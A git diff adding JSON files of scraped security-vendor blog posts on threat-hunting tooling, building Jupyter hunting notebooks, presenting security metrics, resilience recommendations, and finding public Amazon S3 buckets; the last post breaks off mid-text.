0000000000000000000000000000000000000000..782a2f264d784f6e322c4585374d4740e2467f17 --- /dev/null +++ b/how-to-choose-the-right-security-tech-for-threat-hunting.json @@ -0,0 +1,6 @@ +{ + "title": "How to choose the right security tech for threat hunting", + "url": "https://expel.com/blog/how-to-choose-right-security-tech-for-threat-hunting/", + "date": "Jun 4, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG How to choose the right security tech for threat hunting Security operations \u00b7 7 MIN READ \u00b7 ANDREW PRITCHETT \u00b7 JUN 4, 2019 \u00b7 TAGS: Get technical / How to / Hunting / SOC / Tools Before joining Expel, I worked as a police officer in Alaska and spent my days focused on digital forensics. I loved combing through heaps of forensic data to find that one photo or text message to seal the case. There were more than a few cases where, after serving a warrant and seizing equipment, we had an entire rack of computers, phones and media storage devices waiting for analysis. I jumped right in, eager to see where the data would take me, and then I\u2019d click on the \u201cstart\u201d button to kick off that analysis. Several hours later, I\u2019d return and see that only a portion of the processing actually completed. But finding that one hidden gem required countless hours of string searching, regular expression searching, hash matching, dissecting sqlite data and plists, or searching through hex for header byte sequences. When I\u2019m digging through a mountain of data looking for evidence of a crime, or poking around trying to find an unauthorized login on a company\u2019s network, threat hunting feels the same \u2014 it\u2019s still that proverbial \u201cneedle in a haystack\u201d-type task. Although my old school version of threat hunting was more \u201cbows and arrows\u201d than NCIS, the goal of threat hunting today is still to separate the needle from the haystack \u2014 where the needle is an unauthorized activity and the haystack is \u201cbusiness as usual\u201d within the network. Today, there are lots of shiny tools at your disposal to use for threat hunting. But how do you decide which is right for your hunt? And will using multiple technologies speed up or slow down your hunt? Or does it depend on what you\u2019re hunting for? If you\u2019ve already got the basics of threat hunting down and know what you\u2019ll be looking for, here are some tips on how to choose the right weapon (er, tech) to carry out your hunt. (Psst: If you\u2019re new to threat hunting and are looking for more info on what threat hunting is and if it\u2019s right for your org, then you should read this post first.) Choosing the right weapon tool OPTION 1: USE YOUR EXISTING SIEM Use this technique when\u2026 You\u2019re looking for a low-cost, low-investment method of hunting, or when you\u2019re just testing the waters to see if threat hunting is something you (and your team, if you\u2019re lucky enough to have one) want to explore for your org. This method is especially useful when you don\u2019t have a development team at your disposal. If you\u2019re using your SIEM as your primary hunting tool, consider testing hunt techniques where you can aggregate multiple data sources. For example, when hunting for suspicious remote logins, you could correlate event logs, sysmon and firewall logs by time, user and source IP address into a single event. Then you can easily review the source reputation, authentication, and immediate processes performed to give greater decision support. Pros: Many SIEMs support the creation of custom dashboards, saved recurring queries, custom alerting and even custom triage workflows, such as Sumo Logic, Splunk, and Exabeam, so you can continually tweak and adjust your dashboards or queries. By using your existing SIEM to hunt, it\u2019s easy to roll your findings into finely tuned detections. As you discover true findings and learn what they look like, use your dashboards to look for specific indicators like domains, IPs and hashes that have helped you identify true findings in the past. Some SIEMs have great APIs where you can export data in order to augment that with other data sources elsewhere, such as OSINT or public/private intel APIs. Cons: There are a few downsides to using your SIEM for hunting. First, you\u2019re often limited by the types of data available from your SIEM, and the SIEM\u2019s retention rates which may be determined by corporate policy. For example, if you have data type X and Y but also need Z and your SIEM doesn\u2019t have it, then you\u2019re missing an important piece of the threat hunting puzzle. At some organizations security administrators will happily make changes to SIEM data sources, while others will make you jump through hoops to get that additional API data fed into the SIEM. Also, it can be hard to enrich SIEM data with things like open source intel, public/private intel APIs or endpoint tech data. Some orgs have gotten around this by having multiple SIEM environments that are governed by different corporate policies. The downside of using multiple SIEMs? Threat hunting gets a lot more expensive. OPTION 2: USE YOUR EXISTING ENDPOINT DETECTION AND RESPONSE (EDR) TECH Use this technique when\u2026 You\u2019re targeting specific behavioral patterns of attackers on endpoints and you have some development support for your team. Using EDR tech for threat hunting can be a great start but in order to get even more out of hunting with an EDR tech, you\u2019ll need to do some work to take advantage of that EDR tech\u2019s data. Over the years, I\u2019ve seen a lot of orgs waste resources by hunting in their EDR tech for open source indicators. Don\u2019t fall into that trap! Automate this task with saved queries and make sure that your EDR tool isn\u2019t already configured to do this work for you. Don\u2019t waste your time creating queries for known malware hashes your EDR tech is already designed to alert on. Instead, take advantage of the EDR\u2019s rich monitoring capability and create queries that focus on behavioral frameworks such as the MITRE ATT&CK Framework . Hunting should augment your detections and help fill gaps, not create extra or redundant triage work for you. Pros: Some EDR technologies like Tanium and Endgame allow you to rapidly query a targeted set of hosts and return a wealth of information from process executions with command line and process relationships with hashes. Carbon Black Response and CrowdStrike Falcon have phenomenal detail in describing process events and capture persistence commands, registry modifications, file modifications and network connections. Many EDR technologies today offer super detailed and targeted views of your endpoints. A good API, such as Carbon Black\u2019s or Endgame\u2019s, allows you to target and export very specific process details from a large number of hosts, and fast. Cons: It\u2019s not always easy to get the data that you need from your EDR. You\u2019ll need some way to export the data or pull it via API, a way to store it and a way to work with it. This could make it difficult for you to stack, sort and filter large volumes of hunt data \u2014 which means you can\u2019t enrich your hunt data with OSINT, public/private APIs or data from your SIEM. You also need to be sure that your EDR is retaining the data that you need (or that you\u2019re storing it elsewhere). If not, you\u2019re limited to hunting in short intervals or in real-time. OPTION 3: SECURITY TECH CONSOLE HUNTING Use this technique when\u2026 You don\u2019t have a SIEM or any EDR tech. Console hunting is a technique where you log into a particular security tech console like Palo Alto Networks or SentinelOne and hunt through the specific data provided through that console. For example, you could log into your firewall console and search for anomalous traffic. Though this technique might get results over time, it\u2019s labor intensive. I\u2019ve seen some analysts fall into the trap of aimlessly clicking around in the hopes of finding a gem within the data. This usually turns into a waste of time. If you want to use your console for hunting, here\u2019s a pro tip: outline a few guidelines to keep your analysts focused on gap analysis detection. The goal here is to identify what your security tech is not already alerting on. How can you leverage the visibility of your tech to detect behavioral indicators not yet being alerted on? Security tech alert review should take place in a separate workflow outside of hunting. Pros: If you already own some security tech and your analysts know how to use those tools, this is a super cost-effective option. Having a well-defined hunt to maintain your focus will keep you out of the analysis traps I mentioned above. Cons: Many security tools have less-than-great UIs. In my experience, the flashier and more futuristic the UI is, the less useful they really are and the more cumbersome they become to actually use. When it comes to using security tech for hunting, you\u2019re usually limited to the UI capabilities in the console. Generally, each security console looks at a limited scope of a specific aspect of your security posture. So if you\u2019re using your console for hunting, export your console data (if you can) so that you can manipulate it further, or feed it into a SIEM if you have one and enrich that data with data from other sources. At the very least, exporting that data into your SIEM will give you more searching, sorting, and filtering options than your console\u2019s UI will. OPTION 4: USING A CUSTOM SCRIPTING INTERPRETER Use this technique when\u2026 You don\u2019t have a SIEM or EDR tech, or when you want to enrich data from your SIEM or EDR tech. Custom scripting will require you to build out some custom tools or research and implement an open-source build found online. FYI, if you\u2019re going this route then make sure you have dev support, or at least a team member who\u2019s comfortable writing scripts. Pros: You can interface with any security tech with an available API and even enrich hunt data with OSINT and public/private intel APIs. Also, if you don\u2019t have an EDR, you can collect data using lots of available open-source projects like PowerForensics or OSQuery . With Powershell Remoting, SSH or EDR technologies you can collect raw data for parsing/analysis and hunt for the presence of specific forensic artifacts. Open-source projects such as Jupyter can ingest, parse, table and plot large volumes of collected data and provide really great decision support for your analysts. Cons: The flexibility here is sometimes outweighed by draining your resources. Creating your own custom hunt often requires lots of resources \u2014 namely people and time. Carefully structure your hunt, verify that you have permissions to carry out the hunt as described and the development support to engineer the code and execute it securely. (Pro tip: Don\u2019t create a super awesome forensics and data collection tool for your next attacker!) Getting started with threat hunting There are lots of things to think about when you create a hunting program. Beyond just selecting the tech you\u2019ll use, spend some time thinking about your goals and the resources you already have at your disposal. Will you need anything else to execute a program successfully? A new tool, or help from your engineering team? Jot down those considerations before you dive into threat hunting. Interested in threat hunting but don\u2019t have the resources to carry it out on your own? Drop us a note \u2014 we\u2019d love to help." +} \ No newline at end of file diff --git a/how-to-create-and-maintain-jupyter-threat-hunting-notebooks.json b/how-to-create-and-maintain-jupyter-threat-hunting-notebooks.json new file mode 100644 index 0000000000000000000000000000000000000000..fecd867ec2c41d7029d601f5984250ef5c599851 --- /dev/null +++ b/how-to-create-and-maintain-jupyter-threat-hunting-notebooks.json @@ -0,0 +1,6 @@ +{ + "title": "How to create and maintain Jupyter threat hunting notebooks", + "url": "https://expel.com/blog/how-to-create-maintain-jupyter-threat-hunting-notebooks/", + "date": "Jun 16, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG How to create and maintain Jupyter threat hunting notebooks Tips \u00b7 6 MIN READ \u00b7 ANDREW PRITCHETT \u00b7 JUN 16, 2020 \u00b7 TAGS: Get technical / Guide / Hunting / Managed detection and response / SOC / Threat hunting / Tools Expel recently had the privilege of participating in Infosec Jupyterthon . It was an awesome opportunity to share what we\u2019re learning about this open-source technology as well as learning from others about what they\u2019re finding, and unique perspectives on how to up our game in efficiency when it comes to incorporating this technology into infosec processes. Following our presentation, which you can check out here , a few participants reached out to me to ask about our process for developing and maintaining an entire library of threat hunting notebooks. In the spirit of sharing with the open-source community, I wanted to write a detailed response that\u2019s available to everyone. We believe that hunting is content that can and should be developed by subject matter experts (SMEs), and our best SMEs for hunt development are our SOC analysts. The job of engineering is to set up systems to enable those SMEs to focus on the parts of the problem that are relevant \u2013 like enabling really simple code deployment by linking GitHub and our CI/CD pipeline with JupyterHub (we wrote about that here ). Another example is using a shared chassis for all of our notebooks, allowing for sharing and reuse of boiler-plate components like API access, analyst notes and report formatting (we also wrote about that here ). By focusing efforts on these things as enabling technologies, our analysts can focus on building hunting techniques and analytics rather than worrying about barriers to deployment. Building off my last blog post , I thought I\u2019d cover how we use configuration files to build and configure our hunting notebooks, which allows our analysts to build new hunting notebooks without requiring them to learn Python. Going on the hunt So how do we do it? I\u2019m going to share a \u201cHello world!\u201d type example to demonstrate our implementation of this framework. But you can check out the complete source code here . Our goal behind the source code is to make it easy for our analysts to generate notebooks based on a standard template, yet allow each of the notebooks enough flexibility to provide unique capabilities required for a specific technique. For example, some of our hunts are based on network artifacts while other hunts are based on process artifacts or cloud platform API usage. Hunts based on network artifacts may have specific capabilities related to reverse DNS, IP address attribution or host to source traffic patterns. However, a process artifact hunt may require different capabilities such as hash reputation lookups and parent/child process relationship patterns. We need to keep the development simple and ensure that all our notebooks have the common capabilities yet allow the flexibility for our analysts to configure the specific capabilities they need to analyze and report on their hunting data sets. In order to do that, we\u2019re going to use yaml files to store easily modifiable configurations, and then build the notebooks from those configurations using the nbformat package in Python following five steps (plus one optional step). Step 1: Configure Docker I started off by configuring a working directory. In my example, I used a Docker container as my engine to run my build. I like using Docker because I can preconfigure my dependencies and anyone with Docker can later run my same build without having to configure any of their own dependencies. To get started with Docker , create a Dockerfile or use the example from my source code. Otherwise, make sure you have Python v.3.5+ installed as well as nbformat and PyYAML . Step 2: Create Configuration Directory Next, I created a directory to store my YAML configuration files. In my source code example, I used the \u201chunt_configs\u201d directory. I have two example hunts in this directory right now (see below); however, you can have as many configuration files as you\u2019d like. Each configuration file builds a new hunting notebook. Configuration file directory Step 3: Create YAML Configuration Files I then created a few YAML configuration files and created some key value pairs that I need in order to give my notebooks their unique characteristics and tools. Each configuration file builds a new hunting notebook. Once you create the file, it\u2019ll look something like this: YAML configuration file data Repeat step three as many times as you need to make sure you have enough notebooks for your hunting technique library. Step 4: Adjust the Build Script for Your Use Time for the Python builder script. I named my script \u201cnotebook_builder.py.\u201d You can name your script anything you want, just make sure that if you\u2019re using Docker, you update the filename in the Docker configuration files. This builder script is what reads the configuration files and generates our Jupyter notebook files (*.ipynb files). The primary function in this script is \u201crun_builder().\u201d First, this function needs to be able to find the current working directory and the directory which contains all of your YAML configuration files: Code to locate configuration files Second, the function will iterate over each of our configuration files so we ensure that we make a unique build for each configuration file. See an example below. Code to iterate over configuration files The function will then give our new notebook object a variable name. This is also where we can add any global metadata and create a new list to store all of the cells we\u2019re about to build. In the example below, I\u2019m using notebook metadata to hide the code cell input from view. I generally like to hide the code cell input so the user experience in Jupyter is more like a web application rather than a Python script. Code to build notebook object From here forward, we repeat the process of building and appending cells to our notebook cells list. There are many options for building your notebooks, including the ability to append \u201cnew_code_cell\u201d or \u201cnew_markdown_cell.\u201d Any data you want to be evaluated by your Jupyter notebook needs to be written in as string data. In this example, I want to import the Pandas package into my notebook. To do this, I\u2019ll append a \u201cnew_code_cell\u201d with the string value \u201cimport pandas.\u201d If I want to print \u201cHello world!\u201d I\u2019ll append a \u201cnew_code_cell\u201d with the string value \u201cprint(\u2018Hello World!\u2019).\u201d Nbformat provides helpful docs for more advanced use cases. Writing code into a notebook cell To insert data into our notebook, all we need to do is reference the data from our YAML file and insert the data using either the f-string or format string methods, like this: f-string example Format string example Our example hunting notebooks all have a title, a data normalization function, a \u201cStart Hunt\u201d button, a decision support section and a hunt data visualizer. The bottom section of the notebook is where each notebook takes on its unique characteristics. In the bottom section, we\u2019ve assembled a set of capabilities to assist with the analysis of the specific hunting techniques. These capabilities live in the \u201c downselects.py \u201d module. At Expel, we call these capabilities downselects. Downselects are designed to help our analysts break down the larger hunting technique theory into smaller sub-theories or subsets of information. We believe this helps to break down the \u201cfind a needle in the haystack\u201d approach to hunting. We also use downselects to provide analysts specific tools they will need to triage their hunting results. Downselects can be enrichment lookups like VirusTotal or Greynoise, or graphs and charts to visually display data in different aspects, or timelines and tables that focus on a specific sub-theory. When the analyst discovers interesting events or patterns in the downselects, they are armed with pivot points to triage and scope the larger dataset, rather than tearing through the dataset aimlessly. To learn more about how we use downselects, checkout our Jupyterthon presentation here . In order to access our downselects and build them into our notebooks, our builder script needs to iterate through a list of our downselects: Code example to iterate through list of dictionary objects We can then insert the function name and parameters from \u201c downselects.py \u201d as a string into a new_code_cell: Image: code example to execute function specified in YAML config file Lastly, our script needs to write our notebook object to a unique file name; otherwise, it will keep writing over the same filename as it iterates over our configuration files. Code example to write notebook So now we have the instructions written in order to build our new hunting notebooks. Let\u2019s build and run them in Jupyter! Step 5: Build and Run Our Hunting Notebooks So now we have the instructions written in order to build our new hunting notebooks. Let\u2019s build and run them in Jupyter! The Docker instructions are designed to build the hunting notebooks when you run the Jupyter notebook service, using this command: \u201cdocker-compose run \u2010\u2010service-ports notebook.\u201d Command line example of build process When we use the Jupyter notebook link, we can see our newly created notebook files in our file tree. Jupyter notebook server and new hunting notebooks Select one of the \u201c*.ipynb\u201d files to view the hunting technique notebook in Jupyter. Example of running built notebook If you need to make a change to one specific notebook or hunting technique, all you need to do is update the specific configuration file for the technique and re-run the notebook service to rebuild the notebooks. If you need to make a change to your core code base, you can modify your \u201cnotebook_builder.py\u201d build script and re-run the notebook service. This way you can ensure that your notebooks will be rebuilt the same way and will run on the latest version of the build. Optional last step (a bonus!): Add to Deployment Pipeline If your organization has a pipeline for continuous integration, such as using CircleCI , your organization can configure the build to run following your change review process. This ensures that your end users are always working off of the latest deployment of your notebooks. Final thoughts Whether you\u2019re using notebooks for customer analytics, performance analytics, data science, threat hunting, sales projections or machine learning, Jupyter notebooks can be really helpful for sharing, presenting and collaborating on data. We hope this post helps take some of the time and stress out of managing your notebooks and allows you more time to actually engage with your data. Huge shout out to everyone who helped put Infosec Jupyterthon 2020 together and to the attendees who gave me the inspiration to write this post. The event was a blast, and we hope to see you all again soon! Have more questions? Let us know !" +} \ No newline at end of file diff --git a/how-to-create-and-share-good-cybersecurity-metrics.json b/how-to-create-and-share-good-cybersecurity-metrics.json new file mode 100644 index 0000000000000000000000000000000000000000..3470503abd228602699f32c71667fb41155e8239 --- /dev/null +++ b/how-to-create-and-share-good-cybersecurity-metrics.json @@ -0,0 +1,6 @@ +{ + "title": "How to create (and share) good cybersecurity metrics", + "url": "https://expel.com/blog/how-to-create-and-share-good-cybersecurity-metrics/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG How to create (and share) good cybersecurity metrics Tips \u00b7 6 MIN READ \u00b7 MATT PETERS \u00b7 MAR 2, 2021 \u00b7 TAGS: MDR / Metrics If you search for \u201chow to measure cybersecurity\u201d or \u201ccybersecurity metrics,\u201d you\u2019ll wind up with an endless list of resources that all claim to have the definitive collection of metrics you should use to measure your cybersecurity program. I\u2019m not going to specifically tell you what you should measure. The devil is in the details \u2013 every process has its hidden complexities that keep any \u201cone size fits all\u201d approach from working particularly well. Instead, I\u2019m going to share my perspective on what you need to bring to that metrics meeting in order to have a productive, meaningful conversation about the business. How I think about cybersecurity metrics (and why) When I think about talking about metrics, my mind naturally moves to art history. As a thought experiment \u2013 take a look at this painting. If you\u2019re not an art history enthusiast, you may just go, \u201cWow, that thing is bananas!\u201d This is a pretty common reaction \u2013 perception overload. If I try to explain the painting by saying, \u201cHey, that\u2019s Medusa\u2019s head right in the middle there,\u201d the problem actually gets worse \u2013 now you\u2019re trying to figure out why Medusa\u2019s head is there. Wasn\u2019t that in a movie or something?!? It\u2019s not that much different attending a slide-driven metrics meeting if we\u2019re not on our game. How to measure cybersecurity Start with context It\u2019s the understanding here that\u2019s missing, which is critical. Whether it\u2019s art history or metrics, we can\u2019t engage the brains of our audience unless we give them some context to connect with. With art, it might be that we just miss out on enjoying a painting, but with metrics, we make decisions based on that (possibly flawed) understanding. Instead of diving right in, what if I introduced the painting to you with this? This oil painting by Sebastiano Ricci is a good example of 18th century Italian painting. It depicts a scene from Greek mythology. During the wedding between Perseus and Andromeda, the happy couple was attacked by a mob led by a jilted suitor. Perseus, located in the center of the image is using the severed head of Medusa (whom he earlier bested in combat to win the hand of Andromeda) to turn some of his attackers to stone. This is seen on the far right of the image, as two of the attacking figures are statues. The attack is ongoing, as seen by the bodies of the wedding guests scattered in the foreground. The painting makes heavy use of diagonal posing to give the impression of movement and action and is a good representation of the late baroque period, where the use of chiaroscuro, or the interaction between light and dark tones in a painting were used to convey mood and meaning. Now the painting starts to make sense. It\u2019s amazing how much detail we can spot once we have a framework to hang the detail on. Now that we know what to look for, we might even notice that one of the attacking soldiers is in the process of being turned to stone, as his arm is half grey and half normal color. In the description of the painting, we provided a brief introduction of who painted the thing, and when. This gives the audience a second to adjust their expectations. If I said, \u201cthis is a neolithic cave painting,\u201d and then showed you this painting, the reaction would\u2019ve been stark. In the context of metrics, this usually sounds like: \u201cWe\u2019re watching our mean-time-to-remediate because it\u2019s key to understanding if our team is overloaded.\u201d How to measure cybersecurity: Articulate the questions you want to answer As you\u2019re thinking about the context you want to offer during the metrics discussion, think about the questions you want answered (or the questions and answers the group might expect of you). For example: Are these metrics of particular importance? What story do the metrics tell us? How did we collect them and from what process? Why do you need two minutes of time to talk about this? We started with an introduction: \u201cThis is a painting of\u2026.\u201d followed by introducing the main characters and offering some smaller details. We want to move through the scene with multiple passes, each pass having slightly more detail than the last. We don\u2019t start with, \u201cLook, it\u2019s Medusa\u2019s head!\u201d When talking about a cybersecurity metrics, this might sound like: \u201cThis is a graph of [X], you can see that generally it\u2019s [Y]. One thing to note is [Z].\u201d Studying the data and the graph can help you pinpoint any trends or oddities you might want to share as you\u2019re offering context. For example: What\u2019s the scale of the graph? Are there two scales? Call that out. Is there a trendline we need to be aware of? Are there multiple lines? If so, why? How to measure cybersecurity: Add structure to the discussion Once your audience has the general sense of what\u2019s going on, move on to the big stuff. Let\u2019s use our painting example again. The foreground is dead bodies, the right side is people being turned to stone. This is how the audience is going to get a sense of what\u2019s going on. In a metrics presentation, this might sound like: \u201cYou\u2019ll notice the overall trend is increasing for the period\u2026\u201d or \u201cWe saw a sharp dip, followed by a recovery\u2026\u201d The questions you\u2019ll likely want to think about here are big structures in the graph: Is it periodic? If so, why? Is there a trend? Are there any big dips or spikes? What do we not see that we were expecting? (e.g. \u201cNormally we\u2019re 2x this rate, but not this month because\u2026..\u201d) How to measure cybersecurity: But what does it mean? At the end of the description I shared with you, I talked about why this painting was important \u2013 it\u2019s a good example of the baroque period. The idea is that this part is the invitation for us to consider something larger about the painting \u2013 above the reach of the characters and the action. But why do we care? In a metrics conversation, it sounds like: \u201cWhat does this mean? What are we going to do about it?\u201d Without these questions and answers, metrics are just another nice graph. Questions you want to think about here are: If there\u2019s a trend, what does it relate to? Is it a natural phenomena? Do we expect it to stop? If there are big spikes, what happened? Are they good or bad for business? Do I need to be worried, excited or just informed about what I\u2019m seeing? This is usually where people get stuck. If you\u2019re having trouble coming up with the meaning of the metric or graph, ask yourself two things: What would it take for us to change the value of the metric over the next day/week/quarter? Would we want to? If you can\u2019t answer those two questions, it\u2019s likely you\u2019re showing a metric that isn\u2019t all that useful. What to avoid during your metrics discussion In a metrics meeting, avoid reading data, titles or legends off the graph \u2014 instead, dive into the context. What I didn\u2019t do when describing the painting is say, \u201cThe painting is of a large room. At 10 o\u2019clock you can see through a window to the outside, which is lighter\u2026\u201d Avoid the temptation to use words to describe what people will see. Use words to help them see something they can\u2019t see. We\u2019re trying to understand what the painter was trying to communicate, not what they painted. \u201cIn Baroque art, the artists were experimenting with the use of light and dark colors. You can see this at 10 o\u2019clock in this painting, where the view outside is light, contrasting with the dark scene in the room.\u201d How do you know you\u2019re doing it right? What all of this translates to when presenting metrics is a combination of audience engagement and identifying or taking next steps. If you\u2019re on the right track, people will: Ask questions about what you\u2019re presenting. (This is usually a good sign, unless their question is: \u201cWhat the hell?\u201d) Interact with the structure of the metric with an eye toward meaning. This might sound like: \u201cI see this in the graph, what causes it?\u201d or \u201cIs the uptick here a cause for concern?\u201d What does this look like in practice? If we\u2019re doing our job well, then our metrics meetings will sing and our business will prosper. Let\u2019s ditch the painting example and share a real-life example of a metric our team recently presented to our colleagues. What we see below is a time series of the number of unique submissions to our phishing service for the last two months. The counts are given at a weekly granularity, where phishing campaigns consisting of more than one email are rolled up into a single count. The overall trend-line, here plotted in grey, is showing a steady increase \u2013 this is expected, as we\u2019ve added a number of new departments over the period. We also see that the variance is increasing \u2013 the high/low swings increase in size over the back half of the period. We believe this is due to new departments being added over the holiday period. This effect should smooth out over the next few months. Example phishing submissions graph What makes all of that useful? Context: I told you what it was a graph of. I didn\u2019t tell you the high and low watermark \u2013 you can read that. But I did tell you what the numbers meant and how we calculated them. Multiple passes: I told you about the line and what it\u2019s doing, as well as the trend line and what it\u2019s about. Structures and functions: I called attention to the mean and the variance, which are both increasing. Meaning: I told you why the mean and variance were increasing, and what you should think about that. Want to read more of our thoughts on cybersecurity metrics, and how we apply some of this thinking in measuring our own Security Operations Center (SOC)? Check out this post and this post." +} \ No newline at end of file diff --git a/how-to-disrupt-attackers-and-enable-defenders-using.json b/how-to-disrupt-attackers-and-enable-defenders-using.json new file mode 100644 index 0000000000000000000000000000000000000000..1d6659153e3baafa2b2756d2e9ada55e473540a0 --- /dev/null +++ b/how-to-disrupt-attackers-and-enable-defenders-using.json @@ -0,0 +1,6 @@ +{ + "title": "How to disrupt attackers and enable defenders using ...", + "url": "https://expel.com/blog/how-to-use-resilience/", + "date": "Feb 8, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG How to disrupt attackers and enable defenders using resilience Tips \u00b7 3 MIN READ \u00b7 GRANT OVIATT \u00b7 FEB 8, 2018 \u00b7 TAGS: How to / Managed security / Mission by Grant Oviatt, Ben Brigida, Jon Hencinski We think it\u2019s important for your managed security service provider\u2019s (MSSP) interests to align with yours. Unfortunately, that\u2019s not always the case. It\u2019s easy to fall into the trap (that many MSSPs do) of measuring their value by just pointing to the number of alerts they review and incident reports they produce. But what if threats don\u2019t show up on any given Tuesday? Well, among other things, it can shine a spotlight on how misaligned your interests can become\u2026 and it can lead to a discussion that goes something like this: Customer: I\u2019m not getting (m)any alerts. What am I paying you for? MSSP: Hold on a sec. [turns knob to send more low-priority alerts to customer] . Are you getting more alerts now? Customer: Ummm\u2026 yeah. Do you really want to get more alerts and more incidents if you aren\u2019t more compromised (if that sounds familiar check out our post on 5 warning signs your MSSP isn\u2019t the right fit )? We don\u2019t think a managed security provider should be off the hook for delivering value just because things are quiet. Finding bad things is critical. But in our view, detection is only half of the equation. We think a managed security service should make your security better, not busier. And getting better means preventing bad things from happening again (and again) or impacting you in the first place. To do that, you need two things: First, you need a way to identify the root causes of incidents and assess risk (beyond the occasional red team exercise) Second, you need the data to make the case for change (even to people who don\u2019t speak security) That\u2019s why we created resilience. What is resilience? Resilience is our way of making you better even when there aren\u2019t any security incidents. At its core, resilience is comprised of recommendations that describe: A specific security risk The potential impact, and The steps to mitigate it Resilience recommendations do one of two things \u2013 disrupt attackers or enable defenders. Recommendations that disrupt attackers prevent threats from successfully performing their intended goal, while recommendations that enable defenders allow your team (including us) to respond more effectively when they do. Resilience recommendations cover a broad spectrum of security content from Windows settings that reduce the exposure of plain text credentials in-memory to specific configurations for getting the most out of your firewall or endpoint detection and response (EDR) solution. Resilience in action So now you\u2019ve heard a little bit about what resilience is\u2026 let\u2019s talk about how it works. Step 1. Find the root cause and identify how to improve Let\u2019s say Expel detects commodity malware on a host in your environment. We\u2019d validate the event, and notify you. That\u2019s where most MSSPs would stop. But we\u2019ll investigate that activity using your technology to understand how the host was infected and provide remediation steps to remove the problem at hand. In the example above, it turns out the host was compromised when a user downloaded and opened an MS Word document with an embedded macro from a phishing email link. This is where most managed detection and response (MDR) providers would stop. It\u2019s also where resilience kicks in to tell you how this incident could have been prevented altogether. In this case, we found the attack would\u2019ve been disrupted if macros were blocked in MS Office files downloaded from the Internet. We also noticed that your defenders could have responded faster if the Palo Alto Networks firewalls had a URL filtering license. The additional license would have allowed us to detect or block maliciously categorized URLs like the phishing link (who says that identifying risk has to be just a pentesting thing?). Where things become more interesting is when you start to tie a bunch of incidents to the same resilience recommendation. Now you can start building a fact-based case for doing something about it \u2013 as long as you\u2019re armed with the right data. Step 2: Arm yourself with data It probably isn\u2019t news to you that blocking MS Office macros is a good idea. We know how hard it can be to implement changes like this in your environment \u2013 especially when there are other business units involved in the decision (talking about you IT). Making the case to get it done is half the battle. To help with that we give you a \u201ctear sheet\u201d for each resilience recommendation. It contains data from your environment and anonymized data from other customers that shows the cost (and risk) of doing nothing about a recommendation. How many of your systems have been impacted? How much time has been spent fixing problems that could have been prevented by addressing the root cause? How have others fared when implementing this recommendation? Conclusion / Executables So that\u2019s a quick overview of how we approach resilience here at Expel. Call us crazy but we just don\u2019t think that being compromised should be a prerequisite for getting value out of your MSSP. That said, you don\u2019t need Expel to put resilience into practice. Here are a couple resilience recommendations our customers have implemented recently to start you off on the path towards security improvement. Resilience example #1: Disrupt attackers Mitigate Microsoft Group Policy Preferences (GPP) vulnerability Resilience example #2: Enable defenders Configure Palo Alto Networks Firewalls to block or alert on C2 URL traffic" +} \ No newline at end of file diff --git a/how-to-find-amazon-s3-bucket-misconfigurations-and-fix.json b/how-to-find-amazon-s3-bucket-misconfigurations-and-fix.json new file mode 100644 index 0000000000000000000000000000000000000000..8476a7d2ca24d7c59041e82f70cffd9d06526b82 --- /dev/null +++ b/how-to-find-amazon-s3-bucket-misconfigurations-and-fix.json @@ -0,0 +1,6 @@ +{ + "title": "How to find Amazon S3 bucket misconfigurations and fix ...", + "url": "https://expel.com/blog/find-amazon-s3-bucket-misconfigurations-fix-them/", + "date": "Mar 6, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG How to find Amazon S3 bucket misconfigurations and fix them ASAP Tips \u00b7 8 MIN READ \u00b7 PETER MICHALSKI \u00b7 MAR 6, 2019 \u00b7 TAGS: Cloud security / Get technical / How to / SOC / Tools Many of our customers run at least part of their infrastructure in public cloud environments, like Amazon Web Services (AWS) , Google Cloud or Microsoft Azure . And while there are plenty of benefits of using the cloud, there are also unique security concerns that organizations need to be aware of. In short, that same security playbook you were using to chase down alerts on your network, laptops and servers isn\u2019t always going to work once you\u2019ve lifted that data into the cloud. Why? We\u2019ve talked about a few reasons here , but the TL;DR is that your users are the new endpoints. One of the biggest challenges we see with cloud security is that people are unpredictable and prone to, well \u2026 ya know, being human . So we often see security incidents happen that are simply errors made by well-intending employees. While they mean well, these errors can (and do) inadvertently put their organization at risk. One of the most common errors that\u2019s been popping up in the news and which we\u2019ve started to see here at Expel is when users accidentally make Amazon S3 buckets public. What\u2019s Amazon S3, why do these breaches happen and how can you protect your own org from making this mistake? We\u2019re laying out all the details for you below. What is Amazon S3? Amazon S3 (\u201cS3\u201d stands for \u201cSimple Storage Service,\u201d BTW) buckets are basically the equivalent of hard drives in the sky. They can be used to store images, videos, websites, backups, new application builds or really anything you want. You can even host a website using Amazon S3, and store all the elements on said website in a bucket. When you create a new Amazon S3 bucket, you\u2019ve got to set a bunch of configurations and settings. You can also adjust the access permissions policies for the bucket and all the data contained in it (more info on all of that right here ). S3 buckets don\u2019t allow public access by default, so if a bucket becomes public, it means a user made a change somewhere along the way. The potential for exposing data through public S3 buckets will always be a risk (even if it\u2019s unintended), but there are a couple steps you can take to quickly identify public-facing S3 buckets and reduce your risk of an incident. Understanding a few details about S3 buckets \u2014 along with some red flags to look out for when users inevitably make them public \u2014 can go a long way towards keeping your org safe. Why do Amazon S3 buckets often wind up public? The short answer? Confusing naming and well-meaning users. Let\u2019s tackle the tricky naming convention first. S3 buckets become public when any permissions are granted to the predefined groups \u201cAuthenticatedUsers\u201d or \u201cAllUsers.\u201d The \u201cAuthenticatedUsers\u201d group represents all AWS accounts, meaning anyone with an AWS account can access that S3 bucket. The \u201cAllUsers\u201d group consists of anyone in the world \u2014 and ya can\u2019t get much more public than that. It\u2019s easy to see how this can cause confusion \u2014 especially if you\u2019re new to cloud. Developers and IT admins have grown up in an (on premise) world where groups with \u201cusers\u201d in the name are limited to only the employees in their organization. So when Joe over in IT accidentally gives \u201cAllUsers\u201d access to the company directory and unwittingly exposes it to anyone with an internet connection, it doesn\u2019t mean he\u2019s a dummy. Well-meaning users is another common way that data stored in S3 buckets becomes public. For example, think about an engineer who\u2019s trying to test something and assigns a bucket to \u201cAuthenticatedUsers\u201d so her new teammate can get quick access to it \u2026 but then forgets to change the settings back. Or perhaps a team member was testing different permissions but they were never reverted. Or maybe the bucket was never configured properly in the first place. You get the idea. There are lots of ways that S3 buckets can become public. How to detect, investigate and respond to Amazon S3 alerts We see a lot of our customers forwarding their AWS logs to a 